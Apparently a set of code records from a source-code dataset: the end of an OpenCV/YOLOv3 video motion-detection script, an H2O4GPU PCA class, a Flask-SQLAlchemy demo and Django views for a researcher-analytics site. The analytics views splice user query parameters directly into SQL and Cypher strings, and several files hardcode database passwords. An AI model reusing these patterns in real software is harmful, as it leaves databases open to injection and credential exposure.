FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 32)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\ncv.namedWindow(\"match\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame1\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame2\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"after dilate\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"draw contours\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"kp\", 
cv.WINDOW_NORMAL)\ncv.namedWindow(\"dst\", cv.WINDOW_NORMAL)\n\ncapture = cv.VideoCapture(videoPath)\nif not capture.isOpened():\n print(\"cannot open the video\")\n exit()\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\nret, frame2 = capture.read()\nrows, cols, ch = frame2.shape\nprint(\"rows = \", rows, \" cols = \", cols)\nframe2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\nframe2_gray = cv.blur(frame2_gray, (5, 5))\nkp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n\nRECT_MIN_WIDTH = 20\nRECT_MIN_HIGHT = 20\n\n# test = True\ntest = False\n\nwhile True:\n frame1 = frame2\n frame1_gray = frame2_gray\n kp1 = kp2\n des1 = des2\n\n ret, frame2 = capture.read()\n if not ret:\n break\n \n frame2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n frame2_gray = cv.blur(frame2_gray, (5, 5))\n\n # kp1, des1 = surf.detectAndCompute(frame1, None)\n kp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n # Draw the detected keypoints\n # kp_img = frame2.copy()\n # kp_img = cv.drawKeypoints(kp_img, kp2, kp_img)\n # cv.imshow(\"kp\", kp_img)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/key_points.jpg\", kp_img)\n # print(\"OK\");\n\n matches = flann.knnMatch(des1, des2, k = 2)\n # print(len(matches))\n good = []\n for m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n if len(good) > MIN_MATCH_COUNT:\n frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n print(M)\n \n matches_mask = mask.ravel().tolist()\n \n warp = cv.warpPerspective(frame1, M, (cols, rows))\n # cv.imshow(\"warp\", warp);\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/warp.jpg\", warp)\n # print(\"OK\")\n\n sub = cv.absdiff(frame2, warp)\n # cv.imshow(\"sub\", sub)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/sub.jpg\", sub)\n # print(\"OK\")\n\n sub = sub[20:rows - 20, 20:cols - 20]\n\n # con_img = sub.copy()\n\n # Experiments showed that thresholding first and then converting to\n # grayscale works better than converting to grayscale before thresholding\n ret2, dst = cv.threshold(sub, 50, 255, cv.THRESH_BINARY)\n dst_gray = cv.cvtColor(dst, cv.COLOR_BGR2GRAY)\n # dst_gray = cv.cvtColor(sub, cv.COLOR_BGR2GRAY)\n # ret2, dst_gray = cv.threshold(dst_gray, 80, 255, cv.THRESH_BINARY)\n\n # cv.imshow(\"threshold\", dst_gray)\n\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n cv.imshow(\"after dilate\", dst_gray)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/dilate.jpg\", dst_gray)\n print(\"OK\")\n\n # edges = cv.Canny(dst, 300, 450)\n # cv.imshow(\"edges\", edges)\n contours, hierarchy = cv.findContours(dst_gray, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n # cv.drawContours(con_img, contours, -1, 255, 1)\n # cv.imshow(\"draw contours\", con_img)\n if hierarchy is None:\n continue\n \n temp = frame2[20:rows - 20, 20:cols - 20].copy()\n for c in contours:\n rect = cv.boundingRect(c)\n color = (rng.randint(0, 255), rng.randint(0, 255), rng.randint(0, 255))\n x, y, w, h = rect\n # if cv.contourArea(c) > 200 and w < RECT_MAX_WIDTH and h < RECT_MAX_HIGHT \\\n # and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n if cv.contourArea(c) > 200 and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n label = None\n box = []\n if not test:\n roi = temp[y:y+h, 
x:x+w]\n blob = cv.dnn.blobFromImage(roi, 1/255, (inpWidth, inpHeight), [0, 0, 0], 1, crop=False)\n net.setInput(blob)\n outputName = getOutputsNames(net)\n outs = net.forward(outputName)\n # label = process(outs)\n box, conf, cla = postProcess(roi, outs)\n transform(box, x, y)\n t, _ = net.getPerfProfile()\n # print(\"Inference time: %.2f ms\" % (t * 1000.0 / cv.getTickFrequency()))\n\n if len(box) > 0:\n for i, b in enumerate(box):\n label = f'{cla[i]} {conf[i]:.2f}'\n tex_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n cv.rectangle(temp, (b[0], b[1]), (b[0] + b[2], b[1] + b[3]), color, 2)\n cv.rectangle(temp, (b[0], b[1] - tex_size[1]), (b[0] + tex_size[0], b[1]), color, cv.FILLED)\n cv.putText(temp, label, (b[0], b[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n else:\n cv.rectangle(temp, (x, y), (x + w, y + h), color, 2)\n # if label and not test:\n # text_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n # cv.rectangle(temp, (x, y - text_size[1]), (x + text_size[0], y), color, cv.FILLED)\n # cv.putText(temp, label, (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n totalFrame = (int)(capture.get(cv.CAP_PROP_FRAME_COUNT))\n frameNum = (int)(capture.get(cv.CAP_PROP_POS_FRAMES))\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/rect3.jpg\", temp)\n print(\"OK\")\n text = \"current frame: \" + str(frameNum) + \"/\" + str(totalFrame)\n cv.putText(temp, text, (5, 20), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\n cv.imshow(\"dst\", temp)\n\n else:\n print(\"not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matches_mask = None\n \n # draw_params = dict(matchColor = (0, 255, 0),\n # singlePointColor = None,\n # matchesMask = matches_mask,\n # flags = 2)\n # match = cv.drawMatches(frame1, kp1, frame2, kp2, good, None, **draw_params)\n\n # cv.imshow(\"match\", match)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/match.jpg\", match)\n # print(\"OK\")\n\n key = cv.waitKey(20)\n if key == ord('q'):\n break\n if key == ord('s'):\n cv.imwrite(\"pic/absdiff.jpg\", sub)\n if key == ord('m'):\n cv.imwrite(\"pic/match.jpg\", match)\n if key == ord('t'):\n cv.imwrite(\"pic/threshold.jpg\", dst_gray)\n \ncapture.release()\ncv.destroyAllWindows()\n\n","sub_path":"main_yolov3.py","file_name":"main_yolov3.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
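The stabilisation core of the loop above (recover a homography from matched points, warp the previous frame, diff against the current one) can be verified on synthetic data where the camera motion is a known translation. A self-contained sketch, assuming OpenCV and NumPy:

import cv2 as cv
import numpy as np

src = np.float32([[0, 0], [200, 0], [200, 200], [0, 200],
                  [100, 40], [40, 100], [160, 100], [100, 160]]).reshape(-1, 1, 2)
dst = src + 5.0  # simulate a pure 5-pixel camera translation
M, mask = cv.findHomography(src, dst, cv.RANSAC, 5.0)

frame1 = np.zeros((240, 240), dtype=np.uint8)
frame1[50:100, 50:100] = 255
frame2 = np.zeros_like(frame1)
frame2[55:105, 55:105] = 255  # same object, shifted along with the 'camera'

warp = cv.warpPerspective(frame1, M, (240, 240))
print(cv.absdiff(frame2, warp).sum())  # 0: camera motion compensated away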
+{"seq_id":"299437490","text":"# - * - encoding : utf - 8 - * -\n\"\"\"\n:copyright: 2017 H2O.ai, Inc.\n:license: Apache License Version 2.0 (see LICENSE for details)\n\"\"\"\nimport numpy as np\nfrom ..libs.lib_pca import parameters\nfrom ..solvers.utils import _setter\nfrom ..solvers.truncated_svd import TruncatedSVDH2O, TruncatedSVD, _as_fptr\nfrom ..utils.extmath import svd_flip\n\n\nclass PCAH2O(TruncatedSVDH2O):\n \"\"\"Principal Component Analysis (PCA)\n\n Dimensionality reduction using truncated Singular Value Decomposition\n for GPU\n\n This implementation uses the ARPACK implementation of the truncated SVD.\n Contrary to SVD, this estimator does center the data before computing\n the singular value decomposition.\n\n :param: n_components Desired dimensionality of output data\n\n :param: whiten : bool, optional\n When True (False by default) the `components_` vectors are multiplied\n by the square root of (n_samples) and divided by the singular values to\n ensure uncorrelated outputs with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n \"\"\"\n\n def __init__(self, n_components=2, whiten=False):\n super().__init__(n_components)\n self.whiten = whiten\n self.n_components_ = n_components\n self.mean_ = None\n self.noise_variance_ = None\n\n # pylint: disable=unused-argument\n def fit(self, X, y=None):\n \"\"\"Fit PCA on matrix X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param y Ignored, for ScikitLearn compatibility\n\n :returns self : object\n\n \"\"\"\n self.fit_transform(X)\n return self\n\n # pylint: disable=unused-argument\n def fit_transform(self, X, y=None):\n \"\"\"Fit PCA on matrix X and perform dimensionality reduction\n on X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param: y Ignored, for ScikitLearn compatibility\n\n :returns X_new : array, shape (n_samples, n_components)\n Reduced version of X. 
This will always be a\n dense array.\n\n \"\"\"\n X = np.asfortranarray(X, dtype=np.float64)\n Q = np.empty(\n (self.n_components, X.shape[1]), dtype=np.float64, order='F')\n U = np.empty(\n (X.shape[0], self.n_components), dtype=np.float64, order='F')\n w = np.empty(self.n_components, dtype=np.float64)\n explained_variance = np.empty(self.n_components, dtype=np.float64)\n explained_variance_ratio = np.empty(self.n_components, dtype=np.float64)\n mean = np.empty(X.shape[1], dtype=np.float64)\n param = parameters()\n param.X_m = X.shape[0]\n param.X_n = X.shape[1]\n param.k = self.n_components\n param.whiten = self.whiten\n\n lib = self._load_lib()\n lib.pca(\n _as_fptr(X), _as_fptr(Q), _as_fptr(w), _as_fptr(U),\n _as_fptr(explained_variance), _as_fptr(explained_variance_ratio),\n _as_fptr(mean), param)\n\n self._w = w\n self._U, self._Q = svd_flip(U, Q) # TODO Port to cuda?\n self._X = X\n n = X.shape[0]\n # To match sci-kit #TODO Port to cuda?\n self.explained_variance = self.singular_values_**2 / (n - 1)\n self.explained_variance_ratio = explained_variance_ratio\n self.mean_ = mean\n\n # TODO noise_variance_ calculation\n # can be done inside lib.pca if a bottleneck\n n_samples, n_features = X.shape\n total_var = np.var(X, ddof=1, axis=0)\n if self.n_components_ < min(n_features, n_samples):\n self.noise_variance_ = \\\n (total_var.sum() - self.explained_variance_.sum())\n self.noise_variance_ /= \\\n min(n_features, n_samples) - self.n_components\n else:\n self.noise_variance_ = 0.\n\n X_transformed = U * w\n return X_transformed\n\n # Util to load gpu lib\n def _load_lib(self):\n from ..libs.lib_pca import GPUlib\n\n gpu_lib = GPUlib().get()\n\n return gpu_lib\n\n\nclass PCA(TruncatedSVD):\n \"\"\"\n PCA Wrapper\n\n Selects between h2o4gpu.decomposition.PCASklearn\n and h2o4gpu.solvers.pca.PCAH2O\n\n Documentation:\n import h2o4gpu.decomposition ;\n help(h2o4gpu.decomposition.PCASklearn)\n help(h2o4gpu.solvers.pca.PCA)\n\n :param: backend : Which backend to use. Options are 'auto', 'sklearn',\n 'h2o4gpu'. Default is 'auto'.\n Saves as attribute for actual backend used.\n\n \"\"\"\n\n # pylint: disable=unused-argument\n def __init__(self,\n n_components=2,\n copy=True,\n whiten=False,\n svd_solver=\"arpack\",\n tol=0.,\n iterated_power=\"auto\",\n random_state=None,\n verbose=False,\n backend='auto'):\n super().__init__(n_components, random_state, tol, verbose, backend)\n self.svd_solver = svd_solver\n self.whiten = whiten\n\n import os\n _backend = os.environ.get('H2O4GPU_BACKEND', None)\n if _backend is not None:\n backend = _backend\n\n # Fall back to Sklearn\n # Can remove if fully implement sklearn functionality\n self.do_sklearn = False\n if backend == 'auto':\n params_string = [\n 'svd_solver', 'random_state', 'tol', 'iterated_power'\n ]\n params = [svd_solver, random_state, tol, iterated_power]\n params_default = ['arpack', None, 0., 'auto']\n\n i = 0\n for param in params:\n if param != params_default[i]:\n self.do_sklearn = True\n if verbose:\n print(\"WARNING:\"\n \" The sklearn parameter \" + params_string[i] +\n \" has been changed from default to \" +\n str(param) + \". 
Will run Sklearn PCA.\")\n self.do_sklearn = True\n i = i + 1\n elif backend == 'sklearn':\n self.do_sklearn = True\n elif backend == 'h2o4gpu':\n self.do_sklearn = False\n if self.do_sklearn:\n self.backend = 'sklearn'\n else:\n self.backend = 'h2o4gpu'\n\n from h2o4gpu.decomposition.pca import PCASklearn\n self.model_sklearn = PCASklearn(\n n_components=n_components,\n copy=copy,\n whiten=whiten,\n svd_solver=svd_solver,\n tol=tol,\n iterated_power=iterated_power,\n random_state=random_state)\n self.model_h2o4gpu = PCAH2O(n_components=n_components, whiten=whiten)\n\n if self.do_sklearn:\n self.model = self.model_sklearn\n else:\n self.model = self.model_h2o4gpu\n\n def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n s('oself.components_ = oself.model.components_')\n s('oself.explained_variance_= oself.model.explained_variance_')\n s('oself.explained_variance_ratio_ = '\n 'oself.model.explained_variance_ratio_')\n s('oself.singular_values_ = oself.model.singular_values_')\n s('oself.mean_ = oself.model.mean_')\n s('oself.n_components_ = oself.model.n_components_')\n s('oself.noise_variance_ = oself.model.noise_variance_')\n","sub_path":"src/interface_py/h2o4gpu/solvers/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
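What the GPU kernel computes in fit_transform above can be cross-checked in a few lines of NumPy: centre X, take the SVD, and the explained variances are s**2 / (n - 1), exactly the assignment in the code. A CPU-only sketch:

import numpy as np

X = np.random.rand(100, 5)
Xc = X - X.mean(axis=0)        # centring is what separates PCA from plain SVD
U, s, Vt = np.linalg.svd(Xc, full_matrices=False)
explained_variance = s ** 2 / (X.shape[0] - 1)
X_transformed = U * s          # equivalently Xc @ Vt.T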
+{"seq_id":"233540736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n# Configure the database connection URI\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql://root:mysql@127.0.0.1:3306/test_27\"\n# Disable modification tracking to avoid the extra overhead\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# Initialize the SQLAlchemy object\ndb = SQLAlchemy(app)\n\n\n# Role: the \"one\" side of the one-to-many relationship\nclass Role(db.Model):\n # Explicit table name; defaults to the lowercased class name if omitted\n __tablename__ = \"roles\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # backref adds a 'role' attribute to the User model, so the \"one\" side\n # can be reached directly via user.role\n users = db.relationship('User', backref='role')\n\n def __repr__(self):\n return 'Role %d %s' % (self.id, self.name)\n\n# service mysql restart\n# service mysql stop\n# service mysql start\n# User: the \"many\" side\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # Foreign key storing the Role primary key, so the \"one\" side can be queried directly\n role_id = db.Column(db.Integer, db.ForeignKey(Role.id))\n\n def __repr__(self):\n return 'User %d %s' % (self.id, self.name)\n\n\n\n\n\n# Requirement: fetch the role that a user belongs to\n# select * from role where id = user.role_id\n\n# Requirement: fetch all users that belong to a role\n# select * from user where role_id = role.id\n\n@app.route('/')\ndef index():\n return 'index'\n\n\nif __name__ == '__main__':\n db.drop_all()\n db.create_all()\n\n ro1 = Role(name='admin')\n ro2 = Role(name='user')\n db.session.add_all([ro1, ro2])\n db.session.commit()\n\n user1 = User(name='laowang', role_id=ro1.id)\n user2 = User(name='laoli', role_id=ro1.id)\n user3 = User(name='laozhang', role_id=ro2.id)\n\n db.session.add_all([user1, user2, user3])\n db.session.commit()\n\n app.run(debug=True)\n","sub_path":"Flask_Demo_All/Flask_day03/demo6_sqlalchemy.py","file_name":"demo6_sqlalchemy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
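With the relationship and backref in place, the two "requirement" queries in the comments reduce to attribute access. A sketch using the legacy Flask-SQLAlchemy query API, run inside the application context after the setup above:

user = User.query.get(1)
print(user.role)    # the 'one' side, reached through the backref
role = Role.query.get(1)
print(role.users)   # every User whose role_id points at this role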
+{"seq_id":"402969648","text":"from django.shortcuts import render, redirect\nfrom med.models import Manager, Engineer, Doctor\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserUpdateForm\n\n\n# Create your views here.\ndef home(request):\n # Anonymous users have no .type attribute, so the lookup below raises;\n # the except branch then falls back to the public home page.\n try:\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : doc})\n elif(request.user.type == 'MANAGER'):\n man = Manager.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : man})\n except:\n return render(request, template_name='dashboard/HomePage.html')\n \n \n@login_required\ndef profile(request):\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : doc})\n else:\n return render(request, template_name='dashboard/profile.html')\n\n@login_required\ndef update_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST,request.FILES, instance=request.user)\n if u_form.is_valid():\n u_form.save()\n # messages.success(request, f'Account Info Updated!!')\n return redirect('profile')\n else:\n # messages.error(request, 'An error has occurred!')\n return redirect('profile')\n \n context = {\n 'u_form' : UserUpdateForm(instance=request.user),\n }\n return render(request, \"dashboard/update_profile.html\", context) ","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
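The repeated type checks in home and profile above can be collapsed into a single mapping from the user's type to its model. A possible refactor sketch using the models imported in that file (get_typed_user is a hypothetical helper, not part of the original code):

MODEL_FOR_TYPE = {'ENGINEER': Engineer, 'DOCTOR': Doctor, 'MANAGER': Manager}

def get_typed_user(request):
    model = MODEL_FOR_TYPE.get(getattr(request.user, 'type', None))
    return model.objects.get(id=request.user.id) if model else None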
+{"seq_id":"180253337","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom sqlalchemy import MetaData, create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom collections import namedtuple, defaultdict\nfrom py2neo import Graph, Relationship, NodeMatcher, Node\nfrom django.contrib.postgres.search import SearchVector\nfrom django.contrib.auth import get_user_model\nfrom account.models import Profile\n\nUser = get_user_model()\n\ngraph = Graph(host='neo4j_db', password='_genius01_', scheme='bolt')\n\nmeta = MetaData()\nengine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/keywordsdw')\nconn = engine.connect()\n\npub_engine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/pubdw')\npubconn = pub_engine.connect()\n\nResearcher = namedtuple('Researcher', ['id', 'firstname', 'lastname',\n 'word_en', 'count', 'affiliation',\n 'total_abstract' ,'sc'])\n\n# Create your views here.\ndef res_list(request):\n search_term = request.GET.get('q')\n res_list = []\n nounchunks = []\n if search_term:\n if len(search_term.split(' ')) > 1:\n tsquery = ' & '.join(search_term.split(' '))\n tsquery_word = ' | '.join(search_term.split(' '))\n else:\n tsquery = search_term\n tsquery_word = search_term\n query = (\"select id, chunk_en from noun_chunks where \"\n \"to_tsvector(chunk_en) @@ to_tsquery('%s');\")\n nounchunks += conn.execute(query % tsquery).fetchall()\n results = conn.execute(\"select distinct keywords.id, first_name, last_name, word_en, count, affils.name\"\n \" from keywords inner join affils on keywords.affil_scopus_id=affils.scopus_id \"\n \"where to_tsvector(word_en) @@ to_tsquery('%s')\"\n \" order by count desc\" % tsquery_word).fetchall()\n if results:\n for rec in results:\n query = ('select count(*) from abstracts inner join abstract_has_keywords '\n 'on abstract_has_keywords.abstract_id=abstracts.id '\n 'inner join keywords on keywords.id=abstract_has_keywords.keyword_id '\n 'where keywords.id=%d;')\n total_abstract = conn.execute(query % int(rec[0])).scalar()\n\n fname = rec[1].replace(\"'\", \"\\'\") if rec[1] else ''\n lname = rec[2].replace(\"'\", \"\\'\") if rec[2] else ''\n\n query = (\"select id,scholarship_info_id from authors where lower(first_name)=lower(%s) \"\n \"and lower(last_name)=lower(%s)\")\n _author = conn.execute(query, (fname, lname)).fetchone()\n if _author:\n _author_id, _sc_id = _author[0], _author[1]\n if _author_id:\n if _sc_id:\n sc = True\n else:\n sc = False\n res_list.append(Researcher(_author_id, rec[1], rec[2], rec[3], rec[4], rec[5], total_abstract, sc))\n\n\n profiles = {}\n for word in search_term.split(' '):\n for p in Profile.objects.annotate(\n search=SearchVector('field_of_interest')).filter(search=word):\n field_of_interest = (f.strip() for f in p.field_of_interest.split(','))\n profiles[p.user.username] = (p.user.first_name, p.user.last_name, field_of_interest)\n\n authors = []\n query = (\"select id, first_name,last_name from authors where \"\n \"lower(first_name)=lower(%s) or lower(last_name)=lower(%s);\")\n for id, first_name, last_name in conn.execute(query, (search_term,search_term)):\n authors.append((id,first_name,last_name))\n\n return render(request, template_name='analytics/res_list.html',\n context={'search_term': search_term, 'results': res_list,\n 'nounchunks': nounchunks, 'profiles': profiles,\n 'authors': authors})\n\ndef noun_chunk_detail(request):\n nc_id = 
request.GET.get('ncid')\n abstracts_list = []\n if nc_id:\n nc = conn.execute('select chunk_en from noun_chunks where id=%d' % int(nc_id)).fetchone()[0]\n query = (\"select abstracts.id, title_en, pub_date, cited from abstracts \"\n \"inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id \"\n \"inner join noun_chunks on noun_chunks.id=abstract_has_nounchunk.noun_chunk_id \"\n \"where noun_chunks.id=%d;\")\n for rec in conn.execute(query % int(nc_id)).fetchall():\n _bag = {'abstract': rec}\n _bag['authors'] = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n _bag['nounchunks'] = conn.execute(\"select noun_chunks.* from abstracts inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id inner join \"\n \"noun_chunks on abstract_has_nounchunk.noun_chunk_id=noun_chunks.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n abstracts_list.append(_bag)\n\n else:\n nc = ''\n return render(request, template_name='analytics/nounchunk_abs.html',\n context={'noun_chunk': nc, 'abstracts': abstracts_list})\n\ndef show_profile(request, author_id):\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n author = conn.execute('select * from authors where id=%s' % author_id).fetchone()\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n author_scopus_id = author[3]\n if author:\n query = (\"select word_en from keywords where author_scopus_id='%s'\" % author_scopus_id)\n results = conn.execute(query).fetchall()\n keywords = []\n for rec in results:\n keywords.append(rec[0])\n\n query = (\"select abstracts.id,abstracts.title_en from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author_id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n return render(request, template_name=\"analytics/profile.html\",\n context={'author': author,\n 'abstracts': abstracts,\n 'profile': profile,\n 'degree': degrees.get(int(profile.degree), 'Other'),\n 'fields': fields,\n 'keywords': keywords})\n\n\ndef main_db(request):\n total_words = conn.execute('select count(*) from keywords').scalar()\n total_abstracts = conn.execute('select count(*) from abstracts').scalar()\n fields = []\n query = ('select count(*), name from research_fields inner join '\n 'field_has_abstract on field_has_abstract.field_id=research_fields.id group by name;')\n for field in conn.execute(query).fetchall():\n fields.append(field)\n\n fields = sorted(fields, key=lambda x: x[0], reverse=True)\n return render(request, template_name=\"analytics/main.html\",\n context={'total_words': total_words,\n 'total_abstracts': total_abstracts,\n 'fields': fields\n })\n\n\ndef show_field(request, field_name):\n query = 'MATCH 
(f:Field{name:\"%s\"})-[:IN]-(:Abstract)-[:AUTHORED]-(au:Author)-[:AFFILIATE]-(af:Affiliation{country:\"Thailand\"}) RETURN f,au,af' % field_name\n results = list(graph.run(query))\n authors = []\n if results:\n for res in results:\n authors.append((res['au'], res['af']))\n return render(request, template_name=\"analytics/field_author.html\",\n context={'authors': authors, 'field': field_name})\n\ndef show_profile_by_name(request):\n first_name = request.GET.get('firstname', '')\n last_name = request.GET.get('lastname', '')\n first_name = first_name.replace(\"'\", \"\\'\") if first_name else first_name\n last_name = last_name.replace(\"'\", \"\\'\") if last_name else last_name\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n if first_name and last_name:\n author = conn.execute(\"select * from authors where \"\n \"lower(first_name)=lower(%s) and lower(last_name)=lower(%s)\",\n (first_name, last_name)).fetchone()\n if author:\n if author.scholarship_info_id:\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n degree = degrees.get(profile.degree, '')\n else:\n profile = None\n degree = ''\n keywords = conn.execute(\"select word_en,count from keywords where author_scopus_id='%s'\"\n % author.scopus_id).fetchall()\n keywords = set([(kw.word_en,kw.count) for kw in keywords])\n keywords = sorted(keywords, key=lambda x: x[1], reverse=True)\n query = (\"select abstracts.id,abstracts.title_en \"\n \"from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author.id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n query = (\"select name, country, year from affil_history inner join affils \"\n \"on affils.id=affiliation_id where author_id=%s;\" % author.id)\n affiliations = set((tuple(af) for af in conn.execute(query).fetchall()))\n affiliations = sorted(affiliations, key=lambda x: x[2])\n\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={'author': author, 'abstracts': abstracts,\n 'fields': fields, 'affils': affiliations,\n 'keywords': keywords, 'profile': profile,\n 'degree': degree})\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={})\n\n\ndef show_abstract(request, abstract_id):\n if abstract_id:\n abstract = conn.execute(\"select * from abstracts where id=%s;\" % abstract_id).fetchone()\n if abstract:\n authors = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%s;\"\n % abstract_id).fetchall()\n keywords = conn.execute(\"select * from keywords inner join abstract_has_keywords \"\n \"on abstract_has_keywords.keyword_id=keywords.id inner join \"\n \"abstracts on abstract_has_keywords.abstract_id=abstracts.id \"\n \"where abstracts.id=%s\" % abstract_id).fetchall()\n keywords = set([kw.word_en for kw in 
